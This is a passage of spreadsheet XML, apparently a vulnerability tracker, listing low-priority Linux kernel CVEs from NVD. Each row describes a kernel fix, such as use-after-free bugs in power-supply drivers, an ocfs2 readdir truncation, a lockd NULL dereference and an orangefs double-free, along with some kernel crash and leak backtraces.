      <c r="L987" s="5" t="inlineStr"/>
      <c r="M987" s="5" t="inlineStr"/>
      <c r="N987" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O987" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P987" s="5" t="inlineStr"/>
      <c r="Q987" s="5" t="inlineStr"/>
      <c r="R987" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: twl4030_charger: cancel workers via devm
bci is devm-allocated. Two workers (bci-&gt;work and bci-&gt;current_worker)
dereference it. twl4030_bci_remove() disables charging and masks
interrupts. It cancels neither worker. A worker pending at remove() can
run after devm frees bci.
The USB transceiver comes from devm_usb_get_phy_by_node(). devm
unregisters its notifier only after remove() returns. A cancel_work_sync()
in remove() can then race a notifier reschedule. devm_work_autocancel()
and devm_delayed_work_autocancel() avoid that. They cancel the workers
during devm release, before bci is freed.
The current_worker is registered first, since devm will cancel in
reverse order and bci-&gt;work can reschedule current_worker.
[Move comment about order into the commit message]</t>
        </is>
      </c>
      <c r="S987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89464</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89467</t>
        </is>
      </c>
      <c r="D988" s="5" t="inlineStr"/>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="inlineStr"/>
      <c r="G988" s="5" t="inlineStr"/>
      <c r="H988" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I988" s="5" t="inlineStr"/>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr"/>
      <c r="L988" s="5" t="inlineStr"/>
      <c r="M988" s="5" t="inlineStr"/>
      <c r="N988" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O988" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P988" s="5" t="inlineStr"/>
      <c r="Q988" s="5" t="inlineStr"/>
      <c r="R988" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: qcom_battmgr: fix use-after-free
qcom_battmgr_pdr_notify() queues enable_work when the PMIC GLINK service
comes up, and the worker recovers battmgr through container_of() to issue
firmware requests. The PMIC GLINK client stays on the client list until
its devres release action runs, so a PDR notification can keep queueing
the work, and a pending or running worker can access battmgr after devres
frees it.
Make enable_work device-managed with devm_work_autocancel(), registered
before the PMIC GLINK client is allocated. The devres cleanup then
releases the client first, so no further notification can queue the work,
and cancels the work before battmgr is freed.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89467</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89468</t>
        </is>
      </c>
      <c r="D989" s="5" t="inlineStr"/>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="inlineStr"/>
      <c r="G989" s="5" t="inlineStr"/>
      <c r="H989" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I989" s="5" t="inlineStr"/>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr"/>
      <c r="L989" s="5" t="inlineStr"/>
      <c r="M989" s="5" t="inlineStr"/>
      <c r="N989" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O989" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P989" s="5" t="inlineStr"/>
      <c r="Q989" s="5" t="inlineStr"/>
      <c r="R989" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: lp8788-charger: fix use-after-free on remove
lp8788_charger_remove() flushes charger_work before unregistering the
IRQs. An IRQ thread can queue charger_work after flush_work() has
returned. The work can then run after devres frees pchg and dereference
it in lp8788_charger_event().
Unregister the IRQs first. free_irq() waits for any running threaded
handler, so no handler can queue more work afterwards. Then use
cancel_work_sync() to cancel pending work or wait for running work to
finish.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89468</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89473</t>
        </is>
      </c>
      <c r="D990" s="5" t="inlineStr"/>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="inlineStr"/>
      <c r="G990" s="5" t="inlineStr"/>
      <c r="H990" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I990" s="5" t="inlineStr"/>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr"/>
      <c r="L990" s="5" t="inlineStr"/>
      <c r="M990" s="5" t="inlineStr"/>
      <c r="N990" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O990" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P990" s="5" t="inlineStr"/>
      <c r="Q990" s="5" t="inlineStr"/>
      <c r="R990" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: bq25890: Fix power_supply reference leak
bq25890_fw_probe() acquires a reference to a secondary charger using
power_supply_get_by_name(), but the reference is not released on later
probe failures or on driver detach.
In particular, failures after bq25890_fw_probe() returns successfully,
such as a failure in bq25890_hw_init(), also leak the reference.
Register a device-managed cleanup action immediately after acquiring
the secondary charger. This releases the reference on all subsequent
probe failures and on driver detach.
Found by code review.</t>
        </is>
      </c>
      <c r="S990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89473</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89474</t>
        </is>
      </c>
      <c r="D991" s="5" t="inlineStr"/>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="inlineStr"/>
      <c r="G991" s="5" t="inlineStr"/>
      <c r="H991" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I991" s="5" t="inlineStr"/>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr"/>
      <c r="L991" s="5" t="inlineStr"/>
      <c r="M991" s="5" t="inlineStr"/>
      <c r="N991" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O991" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P991" s="5" t="inlineStr"/>
      <c r="Q991" s="5" t="inlineStr"/>
      <c r="R991" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: bq256xx: drain usb_work before freeing the charger
The USB-PHY notifier queues usb_work, whose handler calls
power_supply_changed(bq-&gt;charger). The reset devm action only unregisters
the notifier and was registered before the power supplies, so devm frees
bq-&gt;charger on unwind before the action runs; a usb_work still queued can
then dereference it.
Register the reset action after the power supplies, so it unregisters
the notifiers and drains usb_work before the supplies are released.
Initialize usb_work and obtain the PHY references before registering
the notifiers, so the worker cannot run before the supplies exist.
Found by static analysis.</t>
        </is>
      </c>
      <c r="S991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89474</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89475</t>
        </is>
      </c>
      <c r="D992" s="5" t="inlineStr"/>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="inlineStr"/>
      <c r="G992" s="5" t="inlineStr"/>
      <c r="H992" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I992" s="5" t="inlineStr"/>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr"/>
      <c r="L992" s="5" t="inlineStr"/>
      <c r="M992" s="5" t="inlineStr"/>
      <c r="N992" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O992" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P992" s="5" t="inlineStr"/>
      <c r="Q992" s="5" t="inlineStr"/>
      <c r="R992" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: bq24257: fix use-after-free on remove
The STAT-pin interrupt is devm-managed, so it stays armed until the devm
cleanup that runs after remove() returns. remove() cancels
bq-&gt;iilimit_setup_work while the threaded handler can still fire; that
handler reschedules the work and dereferences bq, so the work runs
against freed memory once devm frees bq.
Make the delayed work device-managed with devm_delayed_work_autocancel(),
registered before the interrupt request. The devm cleanup then releases
the interrupt first, so the handler can no longer reschedule the work,
and cancels the work before bq is freed. The explicit
cancel_delayed_work_sync() in remove() is no longer needed and is dropped.
Found by static analysis.</t>
        </is>
      </c>
      <c r="S992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89475</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89484</t>
        </is>
      </c>
      <c r="D993" s="5" t="inlineStr"/>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="inlineStr"/>
      <c r="G993" s="5" t="inlineStr"/>
      <c r="H993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I993" s="5" t="inlineStr"/>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr"/>
      <c r="L993" s="5" t="inlineStr"/>
      <c r="M993" s="5" t="inlineStr"/>
      <c r="N993" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O993" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P993" s="5" t="inlineStr"/>
      <c r="Q993" s="5" t="inlineStr"/>
      <c r="R993" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lockd: fix NULL dereference on lockowner allocation failure
nlmclnt_locks_init_private() installs NLM file lock operations even when
nlmclnt_find_lockowner() fails to allocate a lockowner. nlmclnt_proc()
then returns -ENOMEM, but the VFS still tears down the partially
initialized file_lock and calls locks_release_private().
That invokes nlmclnt_locks_release_private(), which dereferences
fl-&gt;fl_u.nfs_fl.owner and crashes because the owner was never installed.
Clear fl_ops before attempting to initialize the NLM private state, and
install the NLM lock operations only after a lockowner has been allocated
successfully.</t>
        </is>
      </c>
      <c r="S993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89484</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89490</t>
        </is>
      </c>
      <c r="D994" s="5" t="inlineStr"/>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="inlineStr"/>
      <c r="G994" s="5" t="inlineStr"/>
      <c r="H994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I994" s="5" t="inlineStr"/>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr"/>
      <c r="L994" s="5" t="inlineStr"/>
      <c r="M994" s="5" t="inlineStr"/>
      <c r="N994" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O994" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P994" s="5" t="inlineStr"/>
      <c r="Q994" s="5" t="inlineStr"/>
      <c r="R994" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: fix readdir position truncation on 32-bit kernels
In ocfs2_dir_foreach_blk_el(), the directory cookie position is
rebuilt with
	ctx-&gt;pos = (ctx-&gt;pos &amp; ~(sb-&gt;s_blocksize - 1)) | offset;
`ctx-&gt;pos` is loff_t (signed 64-bit), while `sb-&gt;s_blocksize` is
unsigned long.  On 32-bit kernels unsigned long is 32-bit, so the mask
	~(sb-&gt;s_blocksize - 1)
is computed as a 32-bit unsigned value (e.g. 0xfffff000 for a 4 KiB
block size).  In the AND expression with the 64-bit `ctx-&gt;pos`, that
unsigned operand is zero-extended to 64 bits per the usual arithmetic
conversions, yielding 0x00000000fffff000.  The high 32 bits of
`ctx-&gt;pos` are silently cleared, even though directory size is
allowed to exceed 4 GiB.
When readdir() crosses the 4 GiB boundary on a 32-bit kernel the
position is reset back into the first 4 GiB block, making the
re-validation path re-enumerate already-returned dirents indefinitely.
This is ocfs2_dir_foreach_blk_el(), the extent-list readdir path taken
for all non-inline directories, so a directory large enough to cross
4 GiB reaches it.
This is the same class of bug that commit 3dce5bb82c97 ("exfat: Fix
bitwise operation having different size") fixed in exfat, and the
fix mirrors the equivalent ext4 fix in this series.  Cast the operand
to loff_t so the mask is 64-bit before the AND:
	ctx-&gt;pos = (ctx-&gt;pos &amp; ~((loff_t)sb-&gt;s_blocksize - 1)) | offset;
64-bit kernels are unaffected.</t>
        </is>
      </c>
      <c r="S994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89490</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89491</t>
        </is>
      </c>
      <c r="D995" s="5" t="inlineStr"/>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="inlineStr"/>
      <c r="G995" s="5" t="inlineStr"/>
      <c r="H995" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I995" s="5" t="inlineStr"/>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr"/>
      <c r="L995" s="5" t="inlineStr"/>
      <c r="M995" s="5" t="inlineStr"/>
      <c r="N995" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O995" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P995" s="5" t="inlineStr"/>
      <c r="Q995" s="5" t="inlineStr"/>
      <c r="R995" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: cluster: don't sleep while holding o2hb_live_lock in o2hb_region_pin()
Patch series "ocfs2: cluster: o2hb_region_pin() fixes", v2.
This series fixes three related issues in o2hb_region_pin(), all are from
the original implementation in commit: 58a3158a5d17 ("ocfs2/cluster:
Pin/unpin o2hb regions"):
1) It is called with o2hb_live_lock (a spinlock) held, but the
   underlying configfs_depend_item() sleeps (takes inode rwsem and
   pins the filesystem).  This triggers BUG under
   CONFIG_DEBUG_ATOMIC_SLEEP.
2) When called from the configfs drop_item callback, it creates a
   lock order inversion: parent inode_lock -&gt; configfs root
   inode_lock, which can deadlock against subsystem unregistration
   paths taking root -&gt; parent.
3) If pinning fails partway through o2hb_region_inc_user(), the
   o2hb_dependent_users counter is leaked and partially-pinned
   regions are never released, leaving heartbeat regions
   unprotected on subsequent mounts.
Patch 1 reworks o2hb_region_pin() to drop o2hb_live_lock across each
sleeping configfs_depend_item() call, using a config_item reference to
keep the region alive while unlocked.
Patch 2 adds a from_callback parameter to select
configfs_depend_item_unlocked() when called from configfs context,
avoiding the inode_lock nesting.
Patch 3 fixes the error path in o2hb_region_inc_user() to unpin and
decrement the counter on failure.
This patch (of 3):
o2hb_region_pin() is always called with the o2hb_live_lock spinlock held
(from o2hb_region_inc_user() and o2hb_heartbeat_group_drop_item()), but it
calls o2nm_depend_item() -&gt; configfs_depend_item(), which sleeps: it pins
the configfs filesystem and takes the configfs root inode rwsem.  Under
CONFIG_DEBUG_ATOMIC_SLEEP this triggers:
  BUG: sleeping function called from invalid context at kernel/locking/rwsem.c
  in_atomic(): 1, ... name: mount.ocfs2
    down_write
    configfs_depend_item
    o2hb_region_pin
    o2hb_region_inc_user
    o2hb_register_callback
    dlm_register_domain_handlers
    ...
    ocfs2_dlm_init
    ocfs2_mount_volume
    ocfs2_fill_super
Rework o2hb_region_pin() to pin one region at a time with the lock dropped
across the sleeping call: under o2hb_live_lock find the next eligible
region and take a config_item reference to keep it alive, drop the lock,
call o2nm_depend_item(), then retake the lock and record the pin.  The
config_item_put() is done with the lock released as well, since
o2hb_region_release() also acquires o2hb_live_lock and can sleep.  The
region list may change while unlocked, so the scan restarts from the top
after each pin.  Local heartbeat still pins only the matching region;
global heartbeat pins all eligible regions.
The unpin path is unaffected: configfs_undepend_item() only takes a
spinlock and does not sleep.</t>
        </is>
      </c>
      <c r="S995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89491</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89496</t>
        </is>
      </c>
      <c r="D996" s="5" t="inlineStr"/>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="inlineStr"/>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr"/>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr"/>
      <c r="Q996" s="5" t="inlineStr"/>
      <c r="R996" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: always run deallocs on copy-on-write completion
Local fuzzing of 6.12.94 has found the following memory leak
caused by doing 'copy_file_range()' within the same filesystem:
unreferenced object 0xffff88812192c980 (size 32):
  comm "syz.0.49", pid 12095, jiffies 4294964143
  hex dump (first 32 bytes):
    00 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00  ................
    c0 c5 92 21 81 88 ff ff 00 02 00 00 00 06 00 00  ...!............
  backtrace (crc 7068d63f):
    kmemleak_alloc_recursive include/linux/kmemleak.h:42 [inline]
    slab_post_alloc_hook mm/slub.c:4152 [inline]
    slab_alloc_node mm/slub.c:4197 [inline]
    __kmalloc_cache_noprof+0x168/0x2c0 mm/slub.c:4358
    kmalloc_noprof include/linux/slab.h:878 [inline]
    ocfs2_find_per_slot_free_list fs/ocfs2/alloc.c:6618 [inline]
    ocfs2_cache_block_dealloc+0x155/0x4b0 fs/ocfs2/alloc.c:6786
    ocfs2_cache_extent_block_free fs/ocfs2/alloc.c:6819 [inline]
    ocfs2_unlink_path+0x286/0x450 fs/ocfs2/alloc.c:2613
    ocfs2_rotate_subtree_left fs/ocfs2/alloc.c:2779 [inline]
    __ocfs2_rotate_tree_left+0x1f6f/0x2da0 fs/ocfs2/alloc.c:2985
    ocfs2_rotate_tree_left+0x283/0xe00 fs/ocfs2/alloc.c:3237
    ocfs2_try_to_merge_extent+0xf56/0x1a20 fs/ocfs2/alloc.c:3825
    ocfs2_split_extent+0x15f4/0x2940 fs/ocfs2/alloc.c:5138
    ocfs2_clear_ext_refcount+0x2f6/0x550 fs/ocfs2/refcounttree.c:3098
    ocfs2_replace_clusters fs/ocfs2/refcounttree.c:3131 [inline]
    ocfs2_make_clusters_writable fs/ocfs2/refcounttree.c:3255 [inline]
    ocfs2_replace_cow+0x991/0x1660 fs/ocfs2/refcounttree.c:3349
    ocfs2_refcount_cow_hunk fs/ocfs2/refcounttree.c:3427 [inline]
    ocfs2_refcount_cow+0x5e1/0x9f0 fs/ocfs2/refcounttree.c:3470
    ocfs2_prepare_inode_for_write fs/ocfs2/file.c:2340 [inline]
    ocfs2_file_write_iter+0xbda/0x1880 fs/ocfs2/file.c:2451
    iter_file_splice_write+0x890/0xf60 fs/splice.c:743
    do_splice_from fs/splice.c:944 [inline]
    direct_splice_actor+0x232/0x480 fs/splice.c:1167
    splice_direct_to_actor+0x4b4/0xb60 fs/splice.c:1111
    do_splice_direct_actor fs/splice.c:1210 [inline]
    do_splice_direct+0x10f/0x1c0 fs/splice.c:1236
    do_sendfile+0x430/0xbf0 fs/read_write.c:1388
unreferenced object 0xffff88812192c5c0 (size 32):
  comm "syz.0.49", pid 12095, jiffies 4294964143
  hex dump (first 32 bytes):
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    29 70 00 00 00 00 00 00 19 00 00 00 00 00 00 00  )p..............
  backtrace (crc afec850f):
    kmemleak_alloc_recursive include/linux/kmemleak.h:42 [inline]
    slab_post_alloc_hook mm/slub.c:4152 [inline]
    slab_alloc_node mm/slub.c:4197 [inline]
    __kmalloc_cache_noprof+0x168/0x2c0 mm/slub.c:4358
    kmalloc_noprof include/linux/slab.h:878 [inline]
    kzalloc_noprof include/linux/slab.h:1014 [inline]
    ocfs2_cache_block_dealloc+0x25c/0x4b0 fs/ocfs2/alloc.c:6793
    ocfs2_cache_extent_block_free fs/ocfs2/alloc.c:6819 [inline]
    ocfs2_unlink_path+0x286/0x450 fs/ocfs2/alloc.c:2613
    ocfs2_rotate_subtree_left fs/ocfs2/alloc.c:2779 [inline]
    __ocfs2_rotate_tree_left+0x1f6f/0x2da0 fs/ocfs2/alloc.c:2985
    ocfs2_rotate_tree_left+0x283/0xe00 fs/ocfs2/alloc.c:3237
    ocfs2_try_to_merge_extent+0xf56/0x1a20 fs/ocfs2/alloc.c:3825
    ocfs2_split_extent+0x15f4/0x2940 fs/ocfs2/alloc.c:5138
    ocfs2_clear_ext_refcount+0x2f6/0x550 fs/ocfs2/refcounttree.c:3098
    ocfs2_replace_clusters fs/ocfs2/refcounttree.c:3131 [inline]
    ocfs2_make_clusters_writable fs/ocfs2/refcounttree.c:3255 [inline]
    ocfs2_replace_cow+0x991/0x1660 fs/ocfs2/refcounttree.c:3349
    ocfs2_refcount_cow_hunk fs/ocfs2/refcounttree.c:3427 [inline]
    ocfs2_refcount_cow+0x5e1/0x9f0 fs/ocfs2/refcounttree.c:3470
    ocfs2_prepare_inode_for_write fs/ocfs2/file.c:2340 [inline]
    ocfs2_file_write_iter+0xbda/0x1880 fs/ocfs2/file.c:2451
    iter_file_splice_write+0x890/0xf60 fs/splice.c:743
    do_splice_from fs/splice.c:9
---truncated---</t>
        </is>
      </c>
      <c r="S996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89496</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89498</t>
        </is>
      </c>
      <c r="D997" s="5" t="inlineStr"/>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="inlineStr"/>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr"/>
      <c r="Q997" s="5" t="inlineStr"/>
      <c r="R997" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
orangefs: fix double-free of trailer_buf on readdir copy failure
On a readdir downcall, orangefs_devreq_write_iter() frees
op-&gt;downcall.trailer_buf with vfree() when copy_from_iter_full() fails,
but does not clear the pointer before goto Efault. The waiter in
do_readdir() is then woken with a negative status and frees the same
pointer again on its r &lt; 0 path, causing a deterministic double-free.
A client holding /dev/pvfs2-req triggers it by sending a readdir
downcall whose declared trailer_size exceeds the bytes it supplies.
Clear the pointer after freeing so the readdir-side vfree() becomes a
no-op.</t>
        </is>
      </c>
      <c r="S997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89498</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89502</t>
        </is>
      </c>
      <c r="D998" s="5" t="inlineStr"/>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="inlineStr"/>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr"/>
      <c r="Q998" s="5" t="inlineStr"/>
      <c r="R998" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Free cpu_buffer::free_page with subbuf_order
When sub-buffers use an order greater than 0, cpu_buffer-&gt;free_page is
allocated with subbuf_order. Use the correct order for
cpu_buffer-&gt;free_page.</t>
        </is>
      </c>
      <c r="S998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89502</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89505</t>
        </is>
      </c>
      <c r="D999" s="5" t="inlineStr"/>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="inlineStr"/>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr"/>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr"/>
      <c r="Q999" s="5" t="inlineStr"/>
      <c r="R999" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/uverbs: Guard legacy bundles without method_elm
The legacy write() path dispatches through a uverbs_api_write_method, but
the uverbs_attr_bundle passed to provider code does not have an ioctl
method element. If malformed provider input causes the common uverbs
validation code to emit an error message, uverbs_get_handler_fn()
dereferences the uninitialized method_elm pointer.
Initialize method_elm explicitly for legacy bundles and make
uverbs_get_handler_fn() return NULL when no ioctl method is present. The
legacy dispatcher continues to use its local write method, while the ioctl
path continues to use the registered ioctl handler.</t>
        </is>
      </c>
      <c r="S999" s="6" t="inlineStr">
